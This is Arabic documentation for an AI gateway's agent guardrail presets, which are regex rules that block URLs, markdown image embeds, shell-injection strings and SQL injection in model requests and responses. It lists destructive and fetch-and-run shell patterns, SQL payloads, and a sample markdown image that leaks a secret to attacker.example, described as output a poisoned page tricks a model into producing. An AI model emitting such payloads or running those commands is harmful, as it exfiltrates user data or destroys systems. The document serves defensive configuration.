حواجز الحماية الوكيلة

عندما يقود نموذج أدوات، تختبئ السلاسل الخطرة في محتوى عادي: رابط URL يوشك الوكيل على جلبه، صورة markdown سيحمّلها العميل تلقائياً، rm -rf / يردّده النموذج إلى أداة shell، UNION SELECT يصدره لمشغّل SQL لينفذه. سياسة محتوى لا تفكر إلا في PII أو الأسرار تفوت الأربعة. توجد فئة الإعدادات المسبقة Agent لهذا الشكل بالضبط — قواعد regex حتمية تحجب الطلب أو الاستجابة قبل أن تتصرف أداة لاحقة بناءً عليه أبداً. هذه صفحة مركّزة لحالة الاستخدام الوكيلة. لمحرك حواجز الحماية الكامل — كل نوع قاعدة، وحقل، ومرحلة، ومسار — انظر مرجع حواجز الحماية.

1. لماذا حواجز حماية الوكيل سطح متمايز

حاجز الحماية يفحص المحتوى — النص في الطلب والنص في الاستجابة. وبالنسبة لوكيل، يصبح ذلك النص إجراءً: يُجلَب رابط URL، يُصيَّر markdown، يُشغَّل سطر shell، يُنفَّذ SQL. فنفس محرك block / mask الذي تستخدمه لـ PII يؤدي مهمة مزدوجة هنا — يوقف حمولة عند البوابة قبل أن تتمكن طبقة أدوات الوكيل من تحويلها إلى أثر جانبي. تشحن فئة Agent أربعة إعدادات مسبقة، كل منها قاعدة regex بإجراء block، موزّعة عبر المرحلتين:

URL Filter — مدخلات، block

يحجب أي رابط http(s) على الطلب. استخدمه لتدفقات الوكيل حيث يجب وضع قائمة سماح لروابط URL الصادرة بدلاً من فتحها. النمط المبذور يطابق أي رابط؛ حرّر الـ regex للسماح بنطاقات محددة.

Markdown Image Block — مخرجات، block

يحجب تضمينات صور markdown (![alt](url)) في استجابة النموذج. يدافع ضد تسريب تصيير الصور على العملاء الذين يحمّلون الصور البعيدة تلقائياً — قناة تسريب بيانات كلاسيكية حيث يهرّب رابط صورة مُصيَّرة بيانات للخارج.

Tool Call Shell Block — مدخلات، block

يحجب أنماط حقن shell الواضحة في الطلب (rm -rf /، curl … | sh، wget … | bash، تصعيد sudo). استخدمه لتدفقات الوكيل التي قد تعيد توجيه مدخلات المستخدم إلى أداة shell.

SQL Injection in Output — مخرجات، block

يحجب استجابات النموذج التي تحمل حمولات حقن SQL الكلاسيكية (UNION SELECT، OR 1=1، DROP TABLE، منهيات التعليقات). دفاع في العمق للأدوات التي تنفذ تلقائياً SQL أنتجه النموذج.

إعدادان مسبقان يفحصان المدخلات، واثنان يفحصان المخرجات. URL Filter وTool Call Shell Block يُطلقان على الطلب — قبل أن يعمل النموذج، قبل قياس أي حصة. وMarkdown Image Block وSQL Injection in Output يُطلقان على الاستجابة — بعد أن يجيب النموذج، قبل أن يصل المحتوى إلى عميلك أو طبقة أدواته. معرفة أي مرحلة يعيش عليها خطر هي اللعبة كلها؛ انظر مرحلة المدخلات و مرحلة المخرجات.

2. طبّق حاجز حماية وكيل في وحدة التحكم

كل خطوة هنا إجراء وحدة تحكم على البوابة المستضافة تحت جلستك الخاصة. إنشاء وتحرير حواجز الحماية يتطلب Developer+ في مساحة العمل. ولا يستخدم سوى الاستدعاء النهائي /v1/* مفتاح الترحيل sk-orca-... — حاجز الحماية نفسه يُكوَّن بالكامل في وحدة التحكم.

افتح القالب

في وحدة التحكم، افتح Guardrails، انقر زر New guardrail المنقسم، واختر إعداداً مسبقاً من فئة قوالب Agent — مثل Markdown Image Block. يبذر قاعدة حجب regex واحدة في المرحلة الصحيحة.

سمِّ واحفظ

امنحه اسماً (≤ 64 حرفاً)، مثل agent-rails، واحفظ. الإعداد المسبق بذرة، لا قفل — أضف قواعد Agent الثلاث الأخرى أو حرّر الـ regex بحرية بعد ذلك (انظر §4).

اختبره في الـ sandbox

افتح علامة التبويب Test داخل المحرر، الصق عينة، اختر المرحلة المطابقة، وشغّل السياسة الحالية محلياً — بدون استدعاء للأعلى، بدون حصة (انظر §3).

اربط مفتاحاً

حرّر مفتاح API واختر agent-rails من قائمة Guardrail المنسدلة (يضبط guardrail_id على المفتاح)، أو علّمه افتراضي مساحة العمل. انظر اربط بمفتاح و افتراضي الحساب.

3. أثبتها قبل أن تربط

أثبت أن القاعدة تُطلق قبل أن يشير إليها أي مفتاح. افتح علامة التبويب Test، اختر مرحلة output، والصق استجابة قد تكون صفحة مسمومة من مهاجم استدرجت النموذج لإصدارها:

Here is the result: ![status](https://attacker.example/track?d=secret)

يقيّم الـ sandbox السياسة الحالية محلياً — لا يُرسَل شيء للأعلى، ولا يُقاس شيء — ويعيد حكم block مسمّياً القاعدة التي أُطلقت. لشبكة A/B مقابل مجموعة من العينات العدائية والحميدة، تعيش أداة التقييم على بُعد علامة تبويب واحدة.

4. ركّب القواعد واضبطها

الإعدادات المسبقة الأربعة بذور. الحركة الشائعة هي دمجها في حاجز حماية agent-rails واحد وتشديد كل regex لمكدّسك:

ضع قائمة سماح لروابط URL

ابدأ من URL Filter، ثم حرّر الـ regex بحيث يحجب كل رابط URL عدا نطاقاتك المعتمدة — اقلب المطابقة إلى قائمة سماح بدلاً من حجب شامل.

ألّف كواشفك الخاصة

أضف قاعدة regex لأي شكل حمولة تهتم به أدواتك — أنماط RE2، زمن خطي، بدون مراجع خلفية. تُجمَّع الأنماط مرة وتُخزَّن مؤقتاً عبر الطلبات.

امزج قواعد Agent مع بقية المحرك في حاجز حماية واحد. اقرنها بقاعدة PII Shield mask أو حجب مدخلات Secrets Blocker — سياسة واحدة يمكنها حمل كل نوع قاعدة ويطويها المحرك في حكم واحد. انظر الإجراءات لـ block مقابل mask مقابل flag.

5. كيف يبدو الحجب

كل إعداد Agent مسبق يستخدم إجراء block. الطلب المحجوب يعيد HTTP 400 مع رمز الخطأ guardrail_blocked ورسالة تسمّي حاجز الحماية والقاعدة التي أُطلقت:

{
  "error": {
    "code": "guardrail_blocked",
    "message": "request blocked by guardrail \"agent-rails\""
  }
}

الطلب المحجوب لا يكلّف أي حصة — حجب مرحلة المدخلات (URL Filter، Tool Call Shell Block) يُطلق قبل القياس؛ وحجب مرحلة المخرجات (Markdown Image Block، SQL Injection in Output) يردّ الحصة المستهلكة مسبقاً بعد رفض الاستجابة — ويُعلَّم بـ skip-retry، لأن إعادة تشغيل نفس المطالبة ستحجب مجدداً فحسب. انظر خطأ guardrail_blocked.

يُفرض حجب المخرجات على البث أيضاً. للإعدادين المسبقين Agent في مرحلة المخرجات، يثبت block بكلتا الطريقتين: على الاستجابة غير المبثوثة تُفحص الإجابة قبل إرجاعها، وعلى الاستجابة المبثوثة يقطع ماسح التدفق في منتصفه قبل أن يصل أي محتوى محجوب إلى العميل. انظر تغطية البث.

6. حواجز الحماية محتوى؛ جدار الحماية استدعاءات أدوات

حواجز حماية الوكيل طبقة أولى قوية، لكنها تفكر في السلاسل، لا دلالات الأدوات. تحجب سطر shell في المحتوى — لا تفهم أن النموذج أصدر tool_call مهيكلاً لأداة مدمّرة، أو أن طلباً صادراً متجه إلى IP بيانات وصفية. طبقة استدعاء الأداة تلك هي جدار الحماية: يقيّم tool_calls التي يصدرها النموذج، وtools/call لـ MCP، والخروج الصادر، بأحكام مثل allow / audit / deny / pending_approval. الاثنان يتكاملان — حواجز الحماية تفحص النص، وجدار الحماية يحكم الإجراء.

جدار الحماية

احكم استدعاءات الأدوات التي يصدرها النموذج، واستدعاءات MCP، والخروج بأحكام allow / audit / deny / موافقة.

حواجز الحماية مقابل جدار الحماية

متى تلجأ لحاجز حماية محتوى مقابل جدار حماية استدعاء أداة — وكيف تشغّل كليهما.

تأمين وكلاء الذكاء الاصطناعي

مجموعة تحكم الوكيل الكاملة: المحتوى، الأدوات، MCP، والخروج.

الاستقلالية المفرطة

التهديد الذي تعالجه هذه الحواجز — وكيل يفعل أكثر مما ينبغي.

7. انظر ما أُطلق

كل قاعدة تُطلق تسجّل مطابقة — نوع القاعدة، الإجراء، المرحلة، وسلسلة تفصيل — تبرز في تغذية Matches لمساحة العمل. السلسلة الفرعية المطابقة نفسها تُسجَّل فقط عند تفعيل Log raw content، وهو مُطفأ افتراضياً. جمّع التغذية وصفّها حسب حاجز الحماية، ونوع القاعدة، والإجراء لمراقبة معدل إصابة قاعدة الوكيل وضبط الإيجابيات الكاذبة. انظر تغذية المطابقات، التسجيل والخصوصية، و ضبط الإيجابيات الكاذبة.

8. إلى أين تذهب بعد ذلك

قواعد مرحلة المخرجات

كيف يعمل فحص الاستجابة لـ Markdown Image Block وSQL Injection in Output.

كواشف regex

ألّف أنماط RE2 خاصة بك لتوسيع قواعد Agent.

تسريب البيانات

قناة التسريب التي يغلقها Markdown Image Block.

استدعاءات الأدوات الخطرة

لماذا لا يكفي حاجز محتوى وحده — اقرنه بجدار الحماية.

تبقي حواجز حماية الوكيل السلاسل الخطرة خارج المحتوى الذي يرسله ويستقبله وكيل. لحكم الإجراءات التي يتخذها وكيل — استدعاءات الأدوات، واستدعاءات MCP، والخروج نفسها — انتقل إلى جدار الحماية واقرأ خط أساس تأمين وكلاء الذكاء الاصطناعي. لمحرك حواجز الحماية الكامل، انظر مرجع حواجز الحماية.

​1. لماذا حواجز حماية الوكيل سطح متمايز

​2. طبّق حاجز حماية وكيل في وحدة التحكم

​3. أثبتها قبل أن تربط

​4. ركّب القواعد واضبطها

ضع قائمة سماح لروابط URL

ألّف كواشفك الخاصة

​5. كيف يبدو الحجب

​6. حواجز الحماية محتوى؛ جدار الحماية استدعاءات أدوات

جدار الحماية

حواجز الحماية مقابل جدار الحماية

تأمين وكلاء الذكاء الاصطناعي

الاستقلالية المفرطة

​7. انظر ما أُطلق

​8. إلى أين تذهب بعد ذلك

قواعد مرحلة المخرجات

كواشف regex

تسريب البيانات

استدعاءات الأدوات الخطرة

1. لماذا حواجز حماية الوكيل سطح متمايز

2. طبّق حاجز حماية وكيل في وحدة التحكم

3. أثبتها قبل أن تربط

4. ركّب القواعد واضبطها

5. كيف يبدو الحجب

6. حواجز الحماية محتوى؛ جدار الحماية استدعاءات أدوات

7. انظر ما أُطلق

8. إلى أين تذهب بعد ذلك